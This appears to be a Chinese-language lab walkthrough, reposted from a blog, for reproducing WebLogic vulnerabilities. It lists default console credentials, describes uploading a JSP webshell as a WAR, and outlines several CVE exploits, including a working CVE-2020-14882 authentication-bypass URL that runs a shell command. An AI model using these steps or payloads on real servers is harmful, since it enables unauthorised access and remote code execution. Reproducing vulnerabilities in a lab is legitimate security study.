WebLogic 漏洞复现
1、后台弱⼝令GetShell
默认账号密码:weblogic/Oracle@123
weblogic常⽤弱⼝令:https://cirt.net/passwords?criteria=weblogic
这⾥注意, 单个账号错误密码5次之后就会⾃动锁定。
http://47.121.212.195:7001/console
2、登录后台后,点击部署,点击安装,点击上传⽂件。
3、上传war包,jsp⽊⻢压缩成zip,修改后缀为war,上传
一直点击下一步
4、使用工具进行连接
2、CVE-2017-3506
1、验证是否存在wls-wsat组件
http://47.121.212.195:7001/wls-wsat/CoordinatorPortType
2、在当前⻚⾯抓包之后,添加下⾯请求包,反弹shell。
3、CVE-2019-2725
1、http://47.121.212.195:7001/_async/AsyncResponseService
2、在当前⻚⾯抓包 , 修改请求包 , 写⼊shell
3、访问下载到weblogic服务器上的⽊⻢,进⾏连接
4、CVE-2018-2628
1、
2、直接使⽤利⽤工具
5、CVE-2018-2894
1、这⾥环境后台密码是随机得,获取密码: docker-compose logs | grep password
2、设置Web服务测试开启
域结构 -> base-domain -> ⾼级 -> 启动Web服务测试页
3、点击保存 , 进⼊ config.do ⽂件进⾏设置,将⽬录设置为 ws_utc 应⽤的静态⽂件css⽬录
http://47.121.212.195:7001/ws_utc/config.do
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
4、点击安全 , 点击添加
5、打开控制台, 找到对应时间戳
6、Webshell连接
6、CVE-2020-14882
1、访问管理控制台
2、使⽤以下url绕过登录认证
http://47.121.212.195:7001/console/css/%252e%252e%252fconsole.portal
3、⾸先访问以下 URL ,以连接 2 个漏洞并执⾏以下命令
http://47.121.212.195:7001/ console/css/%252e%252e%252fconsole.portal?
_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runti me.getRuntime().exec('touch%20/tmp/success');")
原文地址:https://blog.csdn.net/2301_80402555/article/details/142435869
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!